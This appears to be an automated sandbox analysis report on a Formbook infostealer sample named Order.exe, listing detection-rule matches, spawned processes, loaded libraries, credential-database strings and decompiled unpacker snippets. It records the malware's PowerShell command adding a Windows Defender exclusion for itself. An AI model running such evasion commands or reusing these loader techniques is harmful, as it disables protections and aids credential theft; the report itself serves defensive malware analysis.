                  Source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Order.exe.3a55808.1.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Order.exe.3a6a628.2.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Order.exe.5130000.3.raw.unpack, at4ONG9F0NYCELN5Tj.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, XwfOjXhll0ZZ4kvBsZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, XwfOjXhll0ZZ4kvBsZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/7@16/10
                  Source: C:\Users\user\Desktop\Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order.exe.logJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3848:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojejimv.xok.ps1Jump to behavior
                  Source: Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: mshta.exe, 00000009.00000002.4146580706.00000000083B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE credit_cards ( guid VARCHAR PRIMARY KEY, name_on_card VARCHAR, expiration_month INTEGER, expiration_year INTEGER, card_number_encrypted BLOB, date_modified INTEGER NOT NULL DEFAULT 0, origin VARCHAR DEFAULT '', use_@b;
                  Source: mshta.exe, 00000009.00000002.4146580706.00000000083B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE autofill_profiles ( guid VARCHAR PRIMARY KEY, company_name VARCHAR, `~;
                  Source: mshta.exe, 00000009.00000003.2088990665.0000000003337000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2090094335.0000000003337000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4143600767.0000000003337000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Order.exeReversingLabs: Detection: 65%
                  Source: Order.exeVirustotal: Detection: 49%
                  Source: unknownProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeProcess created: C:\Users\user\Desktop\Order.exe "C:\Users\user\Desktop\Order.exe"Jump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mshta.pdbGCTL source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143627822.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mkvfHfXifKJWp.exe, 00000007.00000000.1815210984.00000000007DE000.00000002.00000001.01000000.0000000C.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000000.1972533286.00000000007DE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Order.exe, 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1906741465.0000000003765000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1904803243.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: Order.exe, Order.exe, 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1906741465.0000000003765000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1904803243.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: qwhy.pdb source: Order.exe
                  Source: Binary string: qwhy.pdbSHA256 source: Order.exe
                  Source: Binary string: mshta.pdb source: Order.exe, 00000005.00000002.1904639284.00000000013A7000.00000004.00000020.00020000.00000000.sdmp, mkvfHfXifKJWp.exe, 00000007.00000002.4143627822.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.Order.exe.3a55808.1.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                  Source: 0.2.Order.exe.3a6a628.2.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                  Source: 0.2.Order.exe.5130000.3.raw.unpack, at4ONG9F0NYCELN5Tj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{cPRyvIfYviaTKciquO(typeof(IntPtr).TypeHandle),cPRyvIfYviaTKciquO(typeof(Type).TypeHandle)})
                  .NET source code contains potential unpacker
                  Source: 0.2.Order.exe.3b11f78.0.raw.unpack, O0Iv47e57KSi8J9mms.cs.Net Code: SdljobcgTy System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.cs.Net Code: SdljobcgTy System.Reflection.Assembly.Load(byte[])
                  Source: Order.exeStatic PE information: 0x990045F9 [Fri May 5 20:39:21 2051 UTC]
                  Source: C:\Users\user\Desktop\Order.exeCode function: 0_2_055A6772 push esp; ret 0_2_055A6779
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_00405130 push 276952D9h; iretd 5_2_00405135
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0041E990 push edx; ret 5_2_0041E991
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_00404A47 push edi; retf 5_2_00404A48
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0041AA8F push ebx; ret 5_2_0041AB40
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0041F303 push edi; iretd 5_2_0041F30F
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_00411B28 pushad ; ret 5_2_00411B29
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_004033A0 push eax; ret 5_2_004033A2
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_00415C53 push 4D40979Fh; retf AA07h5_2_00415DF1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_00426DE3 push edi; ret 5_2_00426DEE
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_00404E7A push ebp; ret 5_2_00404E7B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_00404EC0 push A00DC95Eh; retf 5_2_00404EF3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_00408686 pushad ; retf 5_2_00408687
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0191225F pushad ; ret 5_2_019127F9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019127FA pushad ; ret 5_2_019127F9
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019409AD push ecx; mov dword ptr [esp], ecx5_2_019409B6
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0191283D push eax; iretd 5_2_01912858
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0192AF7D push ebp; retf 0023h5_2_0192AFFA
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01911200 push eax; iretd 5_2_01911369
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0391225F pushad ; ret 9_2_039127F9
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039127FA pushad ; ret 9_2_039127F9
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_039409AD push ecx; mov dword ptr [esp], ecx9_2_039409B6
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_0391283D push eax; iretd 9_2_03912858
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_03911200 push eax; iretd 9_2_03911369
                  Source: C:\Windows\SysWOW64\mshta.exeCode function: 9_2_00B8E785 pushad ; ret 9_2_00B8E786
